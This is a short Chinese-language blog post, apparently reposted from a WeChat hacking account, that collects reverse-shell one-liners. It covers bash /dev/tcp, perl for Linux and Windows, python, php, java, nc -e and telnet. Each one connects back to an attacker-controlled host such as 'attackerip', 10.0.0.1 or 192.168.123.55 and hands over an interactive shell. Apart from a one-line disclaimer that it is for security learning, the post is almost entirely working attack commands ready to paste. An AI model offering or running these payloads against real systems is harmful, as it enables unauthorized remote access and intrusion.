多姿势弹shell 不怕姿势多,就怕记不住

反弹shell是我们最便捷的与目标建立连接的方式之一。本文为大家简单的汇总下常用的shell反弹姿势😘,希望对您的学习有所帮助。

bash

bash -i >& /dev/tcp/192.168.123.55/8080 0>&1

perl

Linux

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

Windows

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

php

<?php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
?>

java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

nc

nc -e /bin/sh 192.168.123.55 1234 

telnet

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

总结

本文对我们常用的shell反弹方法进行了简单的总结。具体反弹需结合实际情况而定。另外文本提供思路仅供网络安全学习和研究,反对一切危害网络安全的行为!

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):多姿势弹shell 不怕姿势多,就怕记不住

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151671.html

(0)
小半的头像小半

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!